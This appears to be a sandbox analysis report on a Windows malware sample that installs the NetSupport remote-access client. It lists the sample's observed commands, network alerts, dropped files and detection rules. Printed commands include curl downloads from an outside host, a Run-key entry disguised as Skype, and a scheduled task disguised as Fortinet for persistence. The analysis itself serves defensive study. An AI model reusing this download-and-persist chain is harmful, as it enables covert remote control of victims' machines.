Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | June 30, 2023, 1:30 p.m. | June 30, 2023, 1:32 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "QMWLkJuNqu" C:\Users\test22\AppData\Local\Temp\1.bat
2568-
-
-
curl.exe curl -k "https://kororo.com/tu5466s/tempy.7z" -o "C:\ProgramData\tempy.7z"
2796
-
-
-
curl.exe curl -k "https://kororo.com/tu5466s/7zz.exe" -o "C:\ProgramData\7zz.exe"
2932
-
-
-
curl.exe curl -k "https://kororo.com/tu5466s/2.bat" -o "C:\ProgramData\2.bat"
3056 -
xcopy.exe xcopy /h /y tempy.7z C:\ProgramData\
908 -
reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
2124 -
reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Skype_x" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
2064
-
-
-
xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
2268 -
xcopy.exe xcopy /h /y tempy.7z C:\ProgramData\
2476 -
-
7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\
2828
-
-
timeout.exe TIMEOUT /T 3
2684 -
schtasks.exe SCHTASKS /create /F /tn "Fortinet" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 5 /sd 01/01/2022 /st 00:00
2840 -
-
client32.exe C:\ProgramData\client32.exe
1120
-
-
reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
3020 -
reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Skype_x" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
2120
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
geo.netsupportsoftware.com | 62.172.138.67 | |
kororo.com | 188.127.225.231 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49210 -> 62.172.138.67:80 | 2034559 | ET POLICY NetSupport GeoLocation Lookup Request | Potential Corporate Privacy Violation |
TCP 192.168.56.101:49209 -> 94.158.244.118:1203 | 2035892 | ET INFO NetSupport Remote Admin Checkin | Misc activity |
TCP 94.158.244.118:1203 -> 192.168.56.101:49209 | 2035895 | ET INFO NetSupport Remote Admin Response | Misc activity |
TCP 192.168.56.101:49209 -> 94.158.244.118:1203 | 2035892 | ET INFO NetSupport Remote Admin Checkin | Misc activity |
TCP 94.158.244.118:1203 -> 192.168.56.101:49209 | 2035895 | ET INFO NetSupport Remote Admin Response | Misc activity |
TCP 192.168.56.101:49209 -> 94.158.244.118:1203 | 2035892 | ET INFO NetSupport Remote Admin Checkin | Misc activity |
TCP 192.168.56.101:49209 -> 94.158.244.118:1203 | 2035892 | ET INFO NetSupport Remote Admin Checkin | Misc activity |
TCP 192.168.56.101:49209 -> 94.158.244.118:1203 | 2035892 | ET INFO NetSupport Remote Admin Checkin | Misc activity |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.3 192.168.56.101:49168 188.127.225.231:443 |
None | None | None |
TLS 1.3 192.168.56.101:49177 188.127.225.231:443 |
None | None | None |
TLS 1.3 192.168.56.101:49184 188.127.225.231:443 |
None | None | None |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://geo.netsupportsoftware.com/location/loca.asp |
request | GET http://geo.netsupportsoftware.com/location/loca.asp |
description | client32.exe tried to sleep 166 seconds, actually delayed analysis time by 166 seconds |
file | C:\ProgramData\remcmdstub.exe |
file | C:\ProgramData\pcicapi.dll |
file | C:\ProgramData\client32.exe |
file | C:\ProgramData\msvcr100.dll |
file | C:\ProgramData\putty.exe |
file | C:\Users\test22\AppData\Local\Temp\b3.vbs |
file | C:\ProgramData\7zz.exe |
file | C:\ProgramData\HTCTL32.DLL |
file | C:\ProgramData\PCICHEK.DLL |
file | C:\ProgramData\PCICL32.DLL |
file | C:\ProgramData\ARCHIVE.bat |
file | C:\ProgramData\sett.bat |
file | C:\ProgramData\7z.bat |
file | C:\ProgramData\TCCTL32.DLL |
file | C:\Users\test22\AppData\Local\Temp\b2.vbs |
file | C:\ProgramData\2.bat |
file | C:\Users\test22\AppData\Local\Temp\b1.vbs |
cmdline | cmd.exe /c C:\ProgramData\sett.bat" |
cmdline | SCHTASKS /create /F /tn "Fortinet" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 5 /sd 01/01/2022 /st 00:00 |
cmdline | cmd.exe /c C:\ProgramData\7z.bat" |
cmdline | cmd.exe /c C:\ProgramData\2.bat" |
wmi | SELECT * FROM Win32_SystemEnclosure |
wmi | SELECT * FROM Win32_ComputerSystem |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active |
cmdline | reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" |
cmdline | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Skype_x" /t REG_SZ /d "C:\ProgramData\client32.exe" /f |
cmdline | SCHTASKS /create /F /tn "Fortinet" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 5 /sd 01/01/2022 /st 00:00 |
wmi | SELECT * FROM Win32_ComputerSystem |
host | 94.158.244.118 |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Skype_x | reg_value | C:\ProgramData\client32.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Skype_x | reg_value | C:\ProgramData\client32.exe | ||||||
cmdline | SCHTASKS /create /F /tn "Fortinet" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 5 /sd 01/01/2022 /st 00:00 |
file | C:\ProgramData\7zz.exe |
file | C:\ProgramData\client32.exe |